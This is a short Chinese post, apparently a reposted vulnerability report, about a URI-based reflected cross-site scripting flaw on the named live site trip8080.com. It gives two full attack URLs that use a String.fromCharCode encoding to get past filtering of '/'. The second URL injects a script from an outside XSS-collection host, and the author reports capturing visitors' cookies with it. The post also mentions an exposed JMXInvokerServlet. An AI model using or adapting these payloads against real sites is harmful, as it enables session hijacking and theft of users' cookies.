来源:自学PHP网 时间:2015-04-17 12:00 作者: 阅读:次
[导读] URI跨站,原来以为有参数才有跨站,没想到......先弹一下。。。。。。然后想着盲打,开始怎么试都不行,以为是 / 被过滤掉了。后来想想,这个是URI形成的跨站如果有 / 结构就被破坏...
|
URI跨站,原来以为有参数才有跨站,没想到......
先弹一下。。。。。。
 然后想着盲打,开始怎么试都不行,以为是 / 被过滤掉了。
后来想想,这个是URI形成的跨站如果有 / 结构就被破坏了。
可以用charcode编码一次,再用string.fromcharcode解码回来就可以绕过/的限制了。
弹窗的
http://www.trip8080.com/chepiao/%3Cvideo%3E%3Csource%20onerror=javascript:document.write%28String.fromCharCode%2860,115,99,114,105,112,116,62,97,108,101,114,116,40,49,41,60,47,115,99,114,105,112,116,62%29%29%3E.htm
截cookie的
http://www.trip8080.com/chepiao/%3Cvideo%3E%3Ciframe%20onload=javascript:document.write%28String.fromCharCode%2860,115,99,114,105,112,116,32,115,114,99,61,34,104,116,116,112,58,47,47,49,46,109,97,103,105,99,120,115,115,46,115,105,110,97,97,112,112,46,99,111,109,47,120,115,115,46,106,115,34,62,60,47,115,99,114,105,112,116,62%29%29%3E.htm
成功截获cookie
 =-=! URL好长可以用短地址修饰下。
外带两个
error message
 JMXInvokerServlet
 修复方案:不会~
|
自学PHP网专注网站建设学习,PHP程序学习,平面设计学习,以及操作系统学习
京ICP备14009008号-1@版权所有www.zixuephp.com
网站声明:本站所有视频,教程都由网友上传,站长收集和分享给大家学习使用,如由牵扯版权问题请联系站长邮箱904561283@qq.com
